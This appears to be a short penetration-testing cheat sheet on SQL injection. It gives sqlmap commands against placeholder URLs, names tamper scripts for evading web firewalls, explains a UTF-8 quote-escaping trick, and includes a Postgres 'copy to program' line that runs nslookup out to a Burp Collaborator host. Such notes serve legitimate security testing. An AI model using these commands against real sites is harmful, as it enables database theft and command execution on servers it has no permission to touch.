SQLi

sqlmap

https://github.com/sqlmapproject/sqlmap

# request in txt
sqlmap -r search-test.txt -p parameter

# post
sqlmap -o -u "http://example.com/index.php?id=1" --data="username=admin&password=pass&submit=+Login+" --method=POST
# get
sqlmap -u "http://example.com/index.php?id=1"

# with point of injection (*)
sqlmap -u "http://example.com/index.php?id=1*-133&debug=true"

# risk
sqlmap -u "http://example.com/index.php?id=1" --risk=3 --level=5

# headers
sqlmap --headers="HEADER"

Temper

The ability to create payloads that can bypass waf

https://github.com/m4ll0k/Atlas

Example:

--tamper="between,randomcase"

Tricks

Sometimes sites append an extra (’) character in injection. It is possible to bypass this behavior by abusing UTF-8. \xc2 asks for a follow up byte, the decoding of \xc2’ (\xc2\x27) would result in a bypass.

Postgres

copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'

Articles

URL
https://www.binarytides.com/sqlmap-hacking-tutorial/
https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html

SQLi

sqlmap

Temper

Tricks

Blind

Articles